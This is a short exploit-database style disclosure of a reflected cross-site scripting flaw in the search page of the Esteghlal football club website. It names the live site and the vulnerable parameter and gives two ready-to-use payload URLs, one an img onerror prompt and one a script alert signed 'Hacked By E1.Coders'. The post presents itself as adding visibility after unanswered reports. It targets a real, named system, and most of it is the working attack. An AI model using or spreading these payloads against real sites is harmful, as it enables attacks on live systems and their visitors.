EXPLOIT XSS Esteghlal F.C. (باشگاه فوتبال استقلال تهران) Site https://fcesteghlal.ir suffers from a remote XSS vulnerability. This security incident was reported by the SOC and Maher team and prevention centers and was ignored this site has not responded to their reports so we are posting this to add visibility to the issue. ################################################################################################### # # # Exploit Title : The Tehran Independence Club site, which is a government site "belonging to the government of the Islamic Republic of Iran", has an XSS INJECTION vulnerability. # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Portal Link : https://fcesteghlal.ir/ # # # # Security Risk : high # # # # Description : All sites coded and designed by novinvision # # # # DorK : fcesteghlal.ir/search?term= # # # ################################################################################################### # # # Expl0iTs: https://fcesteghlal.ir/search?term=<img+src/onerror=prompt(8)> # # https://fcesteghlal.ir/search?term=<script>alert('Hacked+By+E1.Coders')</script>